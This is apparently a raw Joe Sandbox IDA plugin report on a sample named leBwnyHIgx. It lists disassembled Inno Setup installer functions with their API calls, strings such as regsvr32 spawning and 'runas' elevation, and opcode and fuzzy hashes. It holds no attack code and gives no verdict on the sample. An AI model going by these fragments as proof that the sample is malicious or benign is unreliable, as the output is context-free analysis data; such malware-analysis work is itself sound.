                                                                                    • ShowWindow.USER32(?,00000005,00000000,00650E6B,?,?,00000000,?,00000000,00000000,?,0065134E,00000000,00651358,?,00000000), ref: 00650B2F
                                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00650E6B,?,?,00000000,?,00000000,00000000), ref: 00650B55
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000004FF,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00650E6B), ref: 00650B76
                                                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00650E6B,?,?,00000000,?,00000000), ref: 00650B8B
                                                                                      • Part of subcall function 005B0518: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005B05AD,?,?,?,00000001,?,005FB63E,00000000,005FB6A9), ref: 005B054D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                                                    • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                    • API String ID: 66301061-3672972446
                                                                                    • Opcode ID: 11ff9a5d668dd4f2d7e6ff84b01d56f7ef7fac016dca03f85604f83c2993ff07
                                                                                    • Instruction ID: 454a7f8a8ebd9c9c0472cbc412e74aa99abd709555709b689d3e6ddf3cb357b8
                                                                                    • Opcode Fuzzy Hash: 11ff9a5d668dd4f2d7e6ff84b01d56f7ef7fac016dca03f85604f83c2993ff07
                                                                                    • Instruction Fuzzy Hash: 9491E430A042099FEB10EBA4C856BEEBBF6EF49301F614864FD00A7791DA75ED49CB54
                                                                                    APIs
                                                                                    • CoTaskMemFree.OLE32(?,00644047,?,00000000,00000000,?,0064F4D6,00000006,?,00000000,0064FAA0,?,00000000,0064FB5F), ref: 0064403A
                                                                                    • CoTaskMemFree.OLE32(?,0064409A,?,00000000,00000000,?,0064F4D6,00000006,?,00000000,0064FAA0,?,00000000,0064FB5F), ref: 0064408D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeTask
                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                    • API String ID: 734271698-544719455
                                                                                    • Opcode ID: d362a8e580703c39958d1ab9fec0a02ec5da2bad2a648030e91cff165734e93c
                                                                                    • Instruction ID: dd5fc3daa821dda1b6518f9a5080d1dcac5ab9c80f6433aa49f69c11db3ec318
                                                                                    • Opcode Fuzzy Hash: d362a8e580703c39958d1ab9fec0a02ec5da2bad2a648030e91cff165734e93c
                                                                                    • Instruction Fuzzy Hash: 7A8167346002459BDB10EFE4DC46BAE7BA7EB84704F60542AE400B7792CEB8AD55CF66
                                                                                    APIs
                                                                                      • Part of subcall function 0063DBC0: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DBEC
                                                                                      • Part of subcall function 0063DBC0: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC05
                                                                                      • Part of subcall function 0063DBC0: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC2F
                                                                                      • Part of subcall function 0063DBC0: CloseHandle.KERNEL32(00000000), ref: 0063DC4D
                                                                                      • Part of subcall function 0063DCD0: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,0063DD61,?,00000097,?,?,0063DDDB,00000000,0063DEF3,?,?,00000001), ref: 0063DCFF
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0063DE2B
                                                                                    • GetLastError.KERNEL32(00000000,0063DEF3,?,?,00000001), ref: 0063DE34
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000004FF,00000000,0063DED1,?,00000000,0063DEF3,?,?,00000001), ref: 0063DE81
                                                                                    • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0063DEA7
                                                                                    • CloseHandle.KERNEL32(00000000,0063DED8,00000000,00000000,000000FF,000004FF,00000000,0063DED1,?,00000000,0063DEF3,?,?,00000001), ref: 0063DECB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                                                    • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                    • API String ID: 254331816-221126205
                                                                                    • Opcode ID: 34014370f5579deeee9a70eab962f15452e20141bfd9a2655e6417c1dd94800e
                                                                                    • Instruction ID: 19f62c8c6b26142c15b7ccd5ce8ac2d9ded865074aa3ecb0be12b35c3f976091
                                                                                    • Opcode Fuzzy Hash: 34014370f5579deeee9a70eab962f15452e20141bfd9a2655e6417c1dd94800e
                                                                                    • Instruction Fuzzy Hash: 69317671E002099FDB10EFA9E8826EDBAB9FF44704F50057DF514E7391DB7499408B95
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(?), ref: 0061AD63
                                                                                    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 0061AD7F
                                                                                    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 0061AD8D
                                                                                    • GetExitCodeProcess.KERNEL32(?), ref: 0061AD9E
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0061ADE5
                                                                                    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0061AE01
                                                                                    Strings
                                                                                    • Helper isn't responding; killing it., xrefs: 0061AD6F
                                                                                    • Helper process exited, but failed to get exit code., xrefs: 0061ADD7
                                                                                    • Helper process exited with failure code: 0x%x, xrefs: 0061ADCB
                                                                                    • Stopping 64-bit helper process. (PID: %u), xrefs: 0061AD55
                                                                                    • Helper process exited., xrefs: 0061ADAD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                    • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                    • API String ID: 3355656108-1243109208
                                                                                    • Opcode ID: c9807878450f3555804f3481b699adbde9aaaeedd93afa765d6bdd2e8624556d
                                                                                    • Instruction ID: 798cb82454b907f4610273c7cefa33f3cc1412bd95dfbe18a7574247b18f10f4
                                                                                    • Opcode Fuzzy Hash: c9807878450f3555804f3481b699adbde9aaaeedd93afa765d6bdd2e8624556d
                                                                                    • Instruction Fuzzy Hash: EF21AF706457409AC720EBB9D5417CBBAD69F19300F088D2DF19ACB692D7B4E8C09753
                                                                                    APIs
                                                                                      • Part of subcall function 005F89FC: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AE7
                                                                                      • Part of subcall function 005F89FC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AF7
                                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0064EF6A), ref: 0064EDFF
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,0064EF6A), ref: 0064EE26
                                                                                    • SetWindowLongW.USER32(?,000000FC,0064E478), ref: 0064EE60
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33,?,?,000000FC,0064E478,00000000,00400000,00000000), ref: 0064EE95
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33), ref: 0064EF09
                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33,?,?,000000FC,0064E478,00000000), ref: 0064EF17
                                                                                      • Part of subcall function 005F8EF4: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F8FDA
                                                                                    • DestroyWindow.USER32(?,0064EF3A,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33,?,?,000000FC,0064E478,00000000,00400000), ref: 0064EF2D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                    • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                    • API String ID: 1779715363-2312673372
                                                                                    • Opcode ID: 77f6f6f6fb1eb5ada4cbe5229a27d75d8458d2c8502fe412c91970d5af7348ff
                                                                                    • Instruction ID: cb016fcbe83d026b746195098022f91b3a08dbab4975f128bac4cf3c8a8463a3
                                                                                    • Opcode Fuzzy Hash: 77f6f6f6fb1eb5ada4cbe5229a27d75d8458d2c8502fe412c91970d5af7348ff
                                                                                    • Instruction Fuzzy Hash: 04416D70A40208AFDB40EFB8DC52AEEBBF9FB09714F51446AF500F7691E6759E008B64
                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,0061B1BF,?,00000000,0061B21A,?,?,?,00000000), ref: 0061B039
                                                                                    • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,?,?,00000000,0061B154,?,00000000,000000FF,00000000,00000000,00000000,0061B1BF), ref: 0061B096
                                                                                    • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,?,?,00000000,0061B154,?,00000000,000000FF,00000000,00000000,00000000,0061B1BF), ref: 0061B0A3
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000004FF,?,?,-00000020,0000000C,-00004034,00000014,?,?,00000000,0061B154), ref: 0061B0EF
                                                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,0061B12D,?,00000000), ref: 0061B119
                                                                                    • GetLastError.KERNEL32(?,?,00000000,000000FF,0061B12D,?,00000000), ref: 0061B120
                                                                                      • Part of subcall function 005F84D8: GetLastError.KERNEL32(00000000,005F91EE,00000005,00000000,005F9216,?,?,0066978C,?,00000000,00000000,00000000,?,00650A7F,00000000,00650A9A), ref: 005F84DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                    • String ID: CreateEvent$TransactNamedPipe
                                                                                    • API String ID: 2182916169-3012584893
                                                                                    • Opcode ID: f3f6691c1874f446a7c7284f1b6927ee4e9325dc9b34836dbe96d81c1e2aff7b
                                                                                    • Instruction ID: d0b5e641d23b1beaa1296b08846350201fa2eda204b4eae0268dfb10b8facce3
                                                                                    • Opcode Fuzzy Hash: f3f6691c1874f446a7c7284f1b6927ee4e9325dc9b34836dbe96d81c1e2aff7b
                                                                                    • Instruction Fuzzy Hash: 03418E70A00208AFDB01DF99CD91EEEBBB9FB0D314F1541A5FA14E7391D7749A90CA68
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005B1656,?,00000000), ref: 005B1583
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005B1656,?,00000000), ref: 005B15D6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                    • API String ID: 4190037839-2401316094
                                                                                    • Opcode ID: efbe6b4b6ec2bc001232fc299448c635db1c352edd7f61c9ee6d360b2af771fb
                                                                                    • Instruction ID: f3b80c1a87da7667449a85c8543438c8ab4114b066e130539604926b1af64128
                                                                                    • Opcode Fuzzy Hash: efbe6b4b6ec2bc001232fc299448c635db1c352edd7f61c9ee6d360b2af771fb
                                                                                    • Instruction Fuzzy Hash: C7219634A40604ABDB50EBB5CD66ADE7BE8FB84340FA04475E501E3581DB74BE408B58
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00407119
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040711F
                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,005B1257,GetLogicalProcessorInformation), ref: 00407132
                                                                                    • GetLastError.KERNEL32(00000000,005B1257,GetLogicalProcessorInformation), ref: 0040713B
                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,005B1257,00000000,004071B2,?,00000000,005B1257,GetLogicalProcessorInformation), ref: 00407166
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                                                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                                    • API String ID: 1184211438-79381301
                                                                                    • Opcode ID: b2a0f765048d362bf3b63640f3b9e4d4cc1584ec48073b734667f4f9289056ab
                                                                                    • Instruction ID: 2a2551bed56c130c8612e6e6611bb7f0169533bd52abfaf2f231836d318f311a
                                                                                    • Opcode Fuzzy Hash: b2a0f765048d362bf3b63640f3b9e4d4cc1584ec48073b734667f4f9289056ab
                                                                                    • Instruction Fuzzy Hash: 99114571D08204BADB10EFA5D84576EBBF8EB44705F1481BBE914B73C1D67CAA808B5A
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040ED98
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: 92cc54864dd0bbfb11f1611543af708f5326443a752958f50f1db9ea9fa0d6e6
                                                                                    • Instruction ID: f27d7ef7acb61dd46234c6ac8536030262216957dd27a0a5aa9c93a8a5e03d54
                                                                                    • Opcode Fuzzy Hash: 92cc54864dd0bbfb11f1611543af708f5326443a752958f50f1db9ea9fa0d6e6
                                                                                    • Instruction Fuzzy Hash: 6EA17E75900209EFDB24DFA5D880BAEB7B5BF58300F10893AE505B73C0D7B8A945CB94
                                                                                    APIs
                                                                                      • Part of subcall function 005B09C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005B09D7
                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00619D70,?, /s ",0066978C,regsvr32.exe",?,00619D70), ref: 00619CDE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseDirectoryHandleSystem
                                                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                    • API String ID: 2051275411-1862435767
                                                                                    • Opcode ID: bb828082893d3c3d641e3fdd4af0eaaf4cc23e92c20017eec766e67e36a9a3d6
                                                                                    • Instruction ID: 91a7d65596da60d3ab410b317687a4738a38aed02517376cad794b957d245f8b
                                                                                    • Opcode Fuzzy Hash: bb828082893d3c3d641e3fdd4af0eaaf4cc23e92c20017eec766e67e36a9a3d6
                                                                                    • Instruction Fuzzy Hash: A5413F70E0024C9BDB14EFE5D892ADDBBBAAF49304F64407EE504B7282D7746E44CB65
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,?,00000000,02683360,0040763A,?,00000000,02683360,004072DD,00000000,00000220,0042715C,?,004271AA,005B1257,00000000), ref: 004043A2
                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,00000000,02683360,0040763A,?,00000000,02683360,004072DD,00000000,00000220,0042715C,?,004271AA,005B1257), ref: 004043BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 01c8de7d1c52f1379436ba32370cb002541e89dbe2850501a5063f81bbc03de1
                                                                                    • Instruction ID: 18b38d09955f91067994ce57c2704c259faaba03eea283e8c2a7273f2993d898
                                                                                    • Opcode Fuzzy Hash: 01c8de7d1c52f1379436ba32370cb002541e89dbe2850501a5063f81bbc03de1
                                                                                    • Instruction Fuzzy Hash: E97132716043104BD315DF69C984B16BBD8AFC5315F1482BFE984AB3D2C7B8C901CB89
                                                                                    APIs
                                                                                    • GetCapture.USER32 ref: 005A2BA2
                                                                                    • IsWindowUnicode.USER32 ref: 005A2BE5
                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,?), ref: 005A2C00
                                                                                    • SendMessageA.USER32 ref: 005A2C1F
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 005A2C2E
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 005A2C3F
                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,?), ref: 005A2C5F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1994056952-0
                                                                                    • Opcode ID: 79780fc3bec1803b35e57a68d2ec923f4b549fb1d4fc9166e9bf7d30cdcaf988
                                                                                    • Instruction ID: 4dfba5f3d1d218beddb166fd502ba4ee7a64a30cf6ddade1315904ca74e7163d
                                                                                    • Opcode Fuzzy Hash: 79780fc3bec1803b35e57a68d2ec923f4b549fb1d4fc9166e9bf7d30cdcaf988
                                                                                    • Instruction Fuzzy Hash: 51219CB12046096FA620FA5DCA82FAF77DCEF06724F10842AF959C3242EA54FC509774
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 68bf383cb7f79b99f340bdf26841dbaafbf7dd31d34f85d7c5e7cd938e48f808
                                                                                    • Instruction ID: 291e5d107d462672790c1edf6ff7d0cc3542d77857f31f2adbac887a00927ee5
                                                                                    • Opcode Fuzzy Hash: 68bf383cb7f79b99f340bdf26841dbaafbf7dd31d34f85d7c5e7cd938e48f808
